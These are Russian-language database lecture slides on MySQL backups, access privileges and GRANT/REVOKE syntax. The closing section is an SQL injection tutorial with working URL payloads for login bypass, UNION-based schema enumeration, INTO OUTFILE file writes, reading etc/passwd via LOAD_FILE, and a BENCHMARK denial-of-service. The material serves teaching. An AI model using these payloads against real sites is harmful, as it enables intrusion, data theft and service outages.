СУБД. Лекция 9

Резервное копирование: Зачем?

• Восстановление после аварии
• Человек передумал
• Аудит
• Тестирование

Логические резервные копии

• Это обычные файлы, которые можно обрабатывать с помощью стандартных текстовых редакторов.
• Из них легко восстанавливать данные. Достаточно просто подать файл по конвейеру на вход программы mysql или воспользоваться программой mysqlimport.
• Резервное копирование и возврат данных можно выполнять по сети, то есть не на той же машине, где работает сервер MySQL.
• Процедуру можно очень гибко настраивать.
• Они не зависят от подсистемы хранения.
• Они могут помочь избежать повреждения данных.

Логические резервные копии

• Для их генерации требуется работа сервера, так что процессор загружается сильнее.
• В некоторых случаях логические копии оказываются объемнее исходных физических файлов. Зачастую логические копии хорошо поддаются сжатию, но для этого нужно дополнительное процессорное время.
• Потеря точности в представлении чисел с плавающей точкой может помешать правильному восстановлению данных из файлов дампа.
• Для восстановления данных из логической копии необходимо загружать и интерпретировать команды и перестраивать индексы, что возлагает на сервер еще больше работы.

Физические резервные копии

• Для получения физической копии нужно просто скопировать требуемые файлы в другое место. Никакой дополнительной работы для их генерации выполнять не придется.
• Трудоемкость возврата данных из физической копии может быть проще и зависит от подсистемы хранения. В случае MyISAM достаточно просто скопировать файлы в исходное место.
• Физические копии можно переносить между платформами, операционными системами и версиями MySQL.
• Восстановление с физических копий может оказаться быстрее, потому что серверу не нужно выполнять SQL-команды и строить индексы. При наличии таблиц InnoDB, которые не помещаются целиком в память сервера, восстановление данных из физических файлов может быть гораздо быстрее.

Физические резервные копии

• Объем физических файлов InnoDB, как правило, гораздо больше соответствующих логических копий. Обычно в табличном пространстве InnoDB очень много неиспользуемого места. К тому же какое-то пространство отведено под цели, не связанные с хранением табличных данных (буфер вставки, сегмент отката и т. д.).
• Не всегда физическую копию можно перенести на другую платформу, операционную систему или версию MySQL. В частности, препятствием может стать чувствительность к регистру букв и формат чисел с плавающей точкой. Перенос файлов в систему с другим форматом чисел с плавающей точкой вообще невозможен.

Что копировать?

Неочевидные данные

Не забудьте о данных, которые не бросаются в глаза, например: двоичные журналы и журналы транзакций InnoDB.

Код

В частности, триггеры и хранимые процедуры.

Конфигурация репликации

Для восстановления сервера, участвующего в репликации, следует включать в резервную копию все необходимые для репликации файлы.

Конфигурация сервера

Если потребуется восстановить данные после настоящей катастрофы.

Отдельные файлы операционной системы

На UNIX-сервере это могут быть таблицы cron, конфигурация пользователей и групп и правила sudo.

Терминология

Аутентификация

Кто вы такой?

Авторизация

Что вам разрешено делать?

Контроль доступа

Какие данные вам разрешено видеть и/или изменять?

Привилегии и разрешения

Способ представления в MySQL права доступа.

Объектные привилегии разрешают доступ к конкретным объектам.

Глобальные привилегии позволяют что-то делать с самим сервером.

Таблицы доступа

user

В каждой строке хранятся учетные данные пользователя (имя, местоположение и зашифрованный пароль) и его глобальные привилегии.

db

В каждой строке хранятся привилегии уровня базы данных для одного пользователя.

host

В каждой строке хранятся привилегии доступа к одной базе данных для пользователя, подключающегося из заданного местоположения.

tables_priv

В каждой строке хранятся привилегии доступа одного пользователя к одной таблице.

columns_priv

В каждой строке хранятся привилегии доступа одного пользователя к одному столбцу.

procs_priv

В каждой строке представлены привилегии доступа одного пользователя к одной хранимой подпрограмме (процедуре или функции).

Таблицы доступа

Привелегии

GRANT [privileges] ON [objects] TO [user];
GRANT [privileges] ON [objects] TO [user] IDENTIFIED BY [password];
REVOKE [privileges] ON [objects] FROM [user];

Виды записей

• Учетная запись системного администратора

  GRANT ALL PRIVILEGES ON *.* TO root@localhost
  IDENTIFIED BY 'p4ssword' WITH GRANT OPTION;

• Учетные записи администраторов базы данных (АБД)

  GRANT ALL PRIVILEGES ON *.* TO john@localhost
  IDENTIFIED BY 'p4ssword' WITH GRANT OPTION;

• Учетные записи для сотрудников

  GRANT INSERT, UPDATE ON widgets.orders TO 'tera'@'%.widgets.example.com'
  IDENTIFIED BY 'p4ssword';

• Доступ только для протоколирования

  GRANT INSERT ON logs.* TO 'logger'@'%.widgets.example.com'
  IDENTIFIED BY 'p4ssword';

• Резервное копирование

  GRANT SELECT, LOCK TABLES, FILE ON *.* TO 'backup'@'localhost'
  IDENTIFIED BY 'p4ssword';

• Эксплуатация и мониторинг

  GRANT PROCESS, SHUTDOWN on *.* TO 'noc'@'monitorserver.noc.example.com'
  IDENTIFIED BY 'p4ssword';

Отзыв привилегий

GRANT SELECT ON *.* TO 'homer' IDENTIFIED BY 'Simps0n';
 
REVOKE SELECT ON sakila.film FROM 'homer';
-- ERROR 1147 (42000): There is no such grant defined
-- for user 'homer' on host '%' on table 'film'

GRANT SELECT ON sakila.* TO 'homer';

REVOKE ALL PRIVILEGES ON sakila.* FROM 'homer';

DROP USER 'homer';

SQL-injection: Строковой параметр

• http://xxx/news.php?id=1

  SELECT * FROM news WHERE id='$id'

• http://xxx/news.php?id=1'

  SELECT * FROM news WHERE id='1''
  

  mysql_query(): You have an error in your SQL syntax check the manual that corresponds to your MySQL server version for the right syntax to use near '1''
• http://xxx/news.php?id=1'%20--%20

  SELECT * FROM news WHERE id='1' -- '
  

SQL-injection: Авторизация

SELECT * FROM users
WHERE login='$login' AND pass='$pass'

SELECT * FROM users
WHERE login='Admin' -- ' AND pass='123'

  
SELECT * FROM users
WHERE login='Admin' AND pass='123' OR login='Admin' -- '

SELECT * FROM users
WHERE (login='Admin' AND pass='123') OR (login='Admin')

Оператор LIKE

SELECT * FROM users
WHERE login LIKE 'Admin' AND pass LIKE '123'

SELECT * FROM users
WHERE login LIKE 'Admin' AND pass LIKE '%'

SQL-injection: UNION

• http://xxx/news.php?id=1' UNION SELECT 1, 2 --

  SELECT * FROM news WHERE id='1' UNION SELECT 1 --

  Ошибка. «The used SELECT statements have a different number of columns»
• http://xxx/news.php?id=1' UNION SELECT 1, 2 --
  Ошибка. «The used SELECT statements have a different number of columns»
• http://xxx/news.php?id=1' UNION SELECT 1,2,3 --
  Опять ошибка.
• http://xxx/news.php?id=1' UNION SELECT 1,2,3,4,5,6 --
  О! Отобразилось точно также как и http://xxx/news.php?id=1

SQL-injection: GROUP BY/ORDER BY

• http://xxx/news.php?id=1' GROUP BY 2 --
• http://xxx/news.php?id=1' GROUP BY 10 --
  mysql_query(): Unknown column '10' in 'group statement'
• http://xxx/news.php?id=1' GROUP BY 5 --
• http://xxx/news.php?id=1' GROUP BY 7 --
  mysql_query(): Unknown column '7' in 'group statement'
• http://xxx/news.php?id=1' GROUP BY 6 --

SQL-injection: INFORMATION_SCHEMA

• http://xxx/news.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES --
• http://xxx/news.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1 --
• http://xxx/news.php?id=-1' UNION SELECT 1,2,3, COLUMN_NAME,5,6 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’Users’ LIMIT 0,1 --
• http://xxx/news.php?id=-1' UNION SELECT 1,2,3, COLUMN_NAME,5,6 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='Users' LIMIT 1,1 --

SQL-injection: Работа с файлами

• http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 INTO OUTFILE '1.txt' --
• http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php' --
• http://xxx/news.php?id=-1' UNION SELECT 1,2,LOAD_FILE('etc/passwd'),4,5,6

SQL-injection: DOS ататка

SELECT BENCHMARK(100000,md5(current_time));

SELECT BENCHMARK(100000,BENCHMARK(100000,md5(current_time)));

http://xxx/news.php?id=-1' UNION SELECT 1, 2, BENCHMARK(100000,BENCHMARK(100000,md5(current_time ))), 4, 5, 6 --